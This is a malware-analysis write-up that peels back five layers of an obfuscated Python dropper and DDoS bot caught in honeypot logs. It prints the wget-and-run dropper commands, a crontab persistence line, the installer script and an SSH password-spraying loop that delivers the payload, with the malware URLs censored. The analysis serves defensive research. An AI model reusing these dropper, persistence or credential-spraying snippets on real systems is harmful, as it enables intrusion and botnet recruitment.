Deobfuscating multiple layers of malicious python

1. Background
2. Layer One: command line bash/ssh
3. Layer Two: the downloaded python script
4. Layer Three: the embedded, evaluated python script
5. Layer Four: compiled python
6. Layer Five: the final python bot code
7. Final comments

1. Background

One of my research projects analyzes large sets of honeypot logs in order to identify emerging trends in Tools Techniques and Procedures (TTPs) within deployed malware. A recent trend, reported by one of our daily statistical correlation tools, caught my eye and warranted further investigation. Since the results of my analysis may be of interest to others: here's a quick breakdown of one particular python rabbit hole. It's not amazingly complex, but it is far from simple and is generally an interesting breakdown in the usage of multiple layers of obfuscated python in malware.

2. Layer One: command line bash/ssh

The honeypot log in question turned up the following commands (formatted for readability) that started appearing at low levels on 2021-12-12. Other bot networks send similar commands hundreds and thousands of times a day, but this particular command is only caught a few times a day.

cd /tmp
(( apt update -y && apt install python3 wget -y ) || 
 ( yum update -y && yum install epel-release -y && yum install python3 wget -y ))
wget -O updater.zip [MALWAREURLCENSORED]
python3 updater.zip
rm updater.zip && cd ~

This part isn't anything special, of course: it's a simple downloader/dropper that first tries to make sure the tools it needs (python3 and wget) are installed. It does assume it's on a debian or redhat-like system, but otherwise will still work on other systems that have python3 and wget pre-installed (like many, if not most, *nix systems).

Outstanding question 1: When reading scripts like this it always leaves me with random questions like: "what's the point of the final cd to $HOME"?

3. Layer Two: the downloaded python script

The python script that was downloaded (update.zip above) is much more interesting (formatted for brevity and actual malware removal as well):

import base64, codecs
magic = 'aW1wb3J0IHN5cyx...BmbDoNCgkJCQlp'
love = 'MvOhqlOcovOzoP5l...A0MJ1xYJkiM2yh'
god = 'ZCIpDQoJCQlzeXMuZ...8gJycnKQ0KCQlh'
destiny = 'LzZbWlpaVT1eM...tcQDbAPvNAPt0X'
joy = '\x72\x6f\x74\x31\x33'
trust = \
    eval('\x6d\x61\x67\x69\x63') + \
    eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x6c\x6f\x76\x65\x2c\x20\x6a\x6f\x79\x29') + \
    eval('\x67\x6f\x64') + \
    eval('\x63\x6f\x64\x65\x63\x73\x2e\x64\x65\x63\x6f\x64\x65\x28\x64\x65\x73\x74\x69\x6e\x79\x2c\x20\x6a\x6f\x79\x29')
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))

First, to the author: good creative use of variable names.

So what does the above do?

Creates 4 variables (magic … destiny) with base64 encoded strings.
Creates a 5th variable (joy) containing the string "rot13", encoded in hexadecimal.
Create a 6th variable (trust) that is created by concatenating the results from multiple calls to eval(). Each of the inputs to eval() are further obfuscated by encoding the variable names in hexadecimal to prevent (easy) human readability. The arguments of these evals() are really:
1. the string 'magic', thus resulting in the contents of the magic variable
2. the contents of codecs.decode(love, joy), which results in applying the rot13 substitution algorithm to the contents of the love variable
3. the god variable, resulting in its contents
4. the destiny variable and thus its rot13 contents

Summarizing for readability, the trust assignment line becomes:

trust = \
    magic + \
    codecs.decode(love, joy) + \
    god + \
    codecs.decode(destiny, joy) +

The final contents of the trust variable is a base64 string of 1824 characters. This is finally fed to base64.b64decode() and compiled and evaluated. This in turn decodes to yet another python script, which is then executed.

4. Layer Three: the embedded, evaluated python script

The output of the previous step produces a longer string of python code that is passed to compile and eval to run the following code (edited for formatting and malware URL removal). I'll break this longer script into chunks.

First, the top few lines imports things and defines the nw variable and sets it to 12 , which I'll get back to in a minute.

import sys,os,subprocess,time

nw="12"

After that is a number of functions that are just filler, from what I can tell, as they're never actually used:

def a(b):
    c = b*2
    return c

def oO1oO(OO):
    OOO = 0
    return OO

def oOOOO2(OO):
    OOO = 0
    return OO

def oOo1(OO):
    OOO = 0
    return OO

Next there is one more defined function, which actually is used, and is just a wrapper around os.system() to ensure it continues in case of any exceptions being thrown:

def abc(cl):
    try:
        os.system(cl)
    except:
        pass

Finally comes the meat of the script, which starts by checking if a /opt/lsb/.pki file exists on the system being penetrated and if it contains the string from the nw variable above ("12"). Depending on these results, it sets the ald variable to 1 if the file exists and contains "12", or otherwise sets it to 0.

The importance of the ald variable will become apparent in a minute.

I'll also question the need for the while True component of this script at the end of this post.

while True:
    try:
        ald = 0
        try:
            with open('/opt/lsb/.pki', "r+") as fl:
                if nw in fl.read():
                    ald = 1
                else:
                    ald = 0
        except:
            ald = 0

Next, the script similarly sets a crn variable to 1 if a cronjob has already been configured that executes the final malware binary fuse (as we will see a bit later).

crn = 0
try:
    cron = subprocess.check_output("crontab -l",shell=True).decode(\'utf-8\')
    if "fuse" in cron:
        crn = 1
    else:
        crn = 0
except:
    crn = 0

Now that the script has properly probed the system for components of its previous runs, it can actually do something with the results. First, it checks to see if the ald variable indicates that "12" was in the /opt/lsb/.pki file:

if ald == 1:
    print("[1]-  Stopped         /usr/lib/systemd/systemd-logind")
    sys.exit()

This check is functionally acting as a version control system, allowing upgrades to previously compromised systems without re-running the installation script otherwise. Thus, if the author changed the string in the nw variable to "13" but "12" was stored in /opt/lsb/.pki, the rest of the script would continue running to self-update to the latest and greatest malware.

Outstanding question: what's the purpose of this print message?

Note/Bug: Because of the way string searching is used for "12", it would also match "112" and any other string containing "12"; the version handling isn't as robust as it could be. But I'm certainly being picky here in my code review.

Next up, the script installs fuse with apt or yum, kills any running process named fuse, and removes any existing fuse binary from /usr/sbin:

abc(''' apt install fuse python3 -y || yum install epel-release python3 fuse -y ''')
abc(''' pkill fuse; rm /usr/sbin/fuse -R ''')

Afterward, if there is no cron job installed to re-run the fuse binary at reboot, it adds a crontab entry to do so. (Again, the previous check for the string "fuse" in any cronjob will probably produce some false positives.)

if crn == 0:
    abc('''(crontab -l 2>/dev/null || true; echo "@reboot pkill updated;nohup /usr/sbin/fuse>/dev/null &") | crontab - ''')

Finally, we get to the creation of the /opt/lsb/.pki version number file:

abc(''' rm -R /opt/lsb/ ''')
abc(''' mkdir /opt/lsb/ && echo 'keys-0 {}'>/opt/lsb/.pki '''.format(nw))

Finally, we get to the actual fuse malware downloading, installing and initial run. Again, we see the script using print to log a fake stopped message for systemd-logind for some reason.

    abc(''' wget -O /usr/sbin/fuse [MALWAREURLCENSORED] && chmod +x /usr/sbin/fuse''')
    abc(''' nohup /usr/sbin/fuse>/dev/null & ''')

    print("[1]+  Stopped         /usr/lib/systemd/systemd-logind")
    sys.exit()
except:
    sys.exit()

One final Outstanding question: why the while True portion of the script? There is no portion of the script that does not result in sys.exit() being called, which means the while loop should only ever be run once anyway.

5. Layer Four: compiled python

The final /usr/bin/fuse binary that is installed is also a python script, but has been compiled into a linux ELF binary. We can determine this by examining it using strings and/or objdump -D and noticing a pydata section in the ELF dump output. This pydata section contains a compiled python (pyc) formatted block, with a 16 byte header showing that a recent version of python was used to compile it.

We next extract this pydata section in order to extract the compiled python byte code.

objcopy -O binary --only-section=pydata \
   --set-section-flags pydata=alloc fuse fuse-pythoncode.bin

We can use pyinstaller's archive_viewer.py command to list and extract the pieces of the saved pydata section:

cd pyinstaller
PYTHONPATH=. python3 \
./PyInstaller/utils/cliutils/archive_viewer.py -b ../fuse-pythoncode.bin | 
  head -15

['struct',
 'pyimod01_os_path',
 'pyimod02_archive',
 'pyimod03_importers',
 'pyimod04_ctypes',
 'pyiboot01_bootstrap',
 'pyi_rth_pkgutil',
 'pyi_rth_multiprocessing',
 'pyi_rth_inspect',
 'fuse',
 '_cffi_backend.cpython-39-x86_64-linux-gnu.so',
 'bcrypt/_bcrypt.abi3.so',
 'cryptography/hazmat/bindings/_openssl.abi3.so',
 'cryptography/hazmat/bindings/_padding.abi3.so',
 'lib-dynload/_asyncio.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_bz2.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_cn.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_hk.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_iso2022.cpython-39-x86_64-linux-gnu.so',
 'lib-dynload/_codecs_jp.cpython-39-x86_64-linux-gnu.so',

We note that fuse is also the name of the actual final python block to be executed, so we extract this as well using the archive_viewer.py's X command. But it appears to be C-compiled cpython code so decoding it is a bit trickier. However, we're in luck because the developer wasn't as smart as they could have been: if we run strings strings on file, we see 4 base64 encoded strings in the output. Like before, 2 of these are rot13 encoded. We can then combine them using the same techniques as the previous four strings above (magic … destiny).

6. Layer Five: the final python bot code

After extracting these 4 more lines of base64 encoded strings, we get an 845 line python bot script with the following functions in it:

grep 'def ' final-packaged-python.py

def encrypt(data,key):
def decrypt(data,key):
def litehash(data):
def getProxy():
def getRandomPayload(size):
def getRandomString(size):
def pack_varint(val):
def pack_str(bb):
def getSocket(ip, port,ifprox,recons,proxyHost=False,proxyPort=0):
def getSSL(sock, host):
def loader(addr):
def scan():
def http_get(task_name, url, host, ip, port,ifprox, rcns):
def http_fast(task_name, url, host, ip, port,ifprox, rcns):
def mccrash(task_name,ip,port,hostn,ifprox, rcns):
def mcbot(task_name,ip,port,hostn,ifprox, rcns):
def mcping(task_name,ip,port,ifprox, rcns):
def mcdata(task_name,ip,port,hostn,ifprox, rcns):
def junk(task_name,ip,port,ifprox, rcns):
def handshake(task_name,ip,port,ifprox, rcns):
def tcp(task_name,ip,port,size,ifprox, rcns):
def netty(task_name,ip,port,pkt,ifprox, rcns):
def raknet(task_name,ip,port):
def vse(task_name,ip,port):
def udp(task_name,ip,port,size):
def getHTTP(base):
def download_file(url, file):
def attack(method,ip,port,size,threads,times, ifprox, rcns):
def getIP():
def execer(cmd):
def updateProxy(url):

As we can see from this set of functions, we've finally hit the end of the obfuscation train, revealing a general daemon containing various implements of destruction. Included in this final malware toolkit is the original payload delivery string we started with at the top of this post:

payload = "cd /tmp; ...  python3 updater.zip && rm updater.zip && cd ~ "

Along with it, the code to deliver it over SSH:

for i in credentials:
        try:

                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                ssh.connect(addr, username=i[0], password=i[1])

                stdin, stdout, stderr = ssh.exec_command(f'cat /proc/1')

                if str(stdout.read()).split('b\'')[1] != '':

                        i, o, e = ssh.exec_command(payload)
                        time.sleep(10)
                        break
                ssh.close()
        except Exception as E:
                #print(E)
                time.sleep(1)
                continue

7. Final comments

All in all, this was an interesting trail to analyze – it demonstrates the greater level of obfuscation more talented malicious actors will use, beyond what the basic script kiddies will.

Does this (still simple-ish) type of obfuscation technique work? Yes. It almost certainly raises the author above the low-hanging fruit of average malware collection systems. For example, none of the scripts or files above appear in the industry's leading database (VirusTotal) as of the date this analysis was completed. I submitted the final python payload to VirusTotal as well, but all of the engines report "Undetected" and thus not malicious in nature – clearly an error.

The slowly increasing usage of python in active malicious actor communities will hopefully trigger more malware detection engines to beef up their automated algorithms. Hopefully.

Acknowledgments: thank you to Robert Story for reviewing this!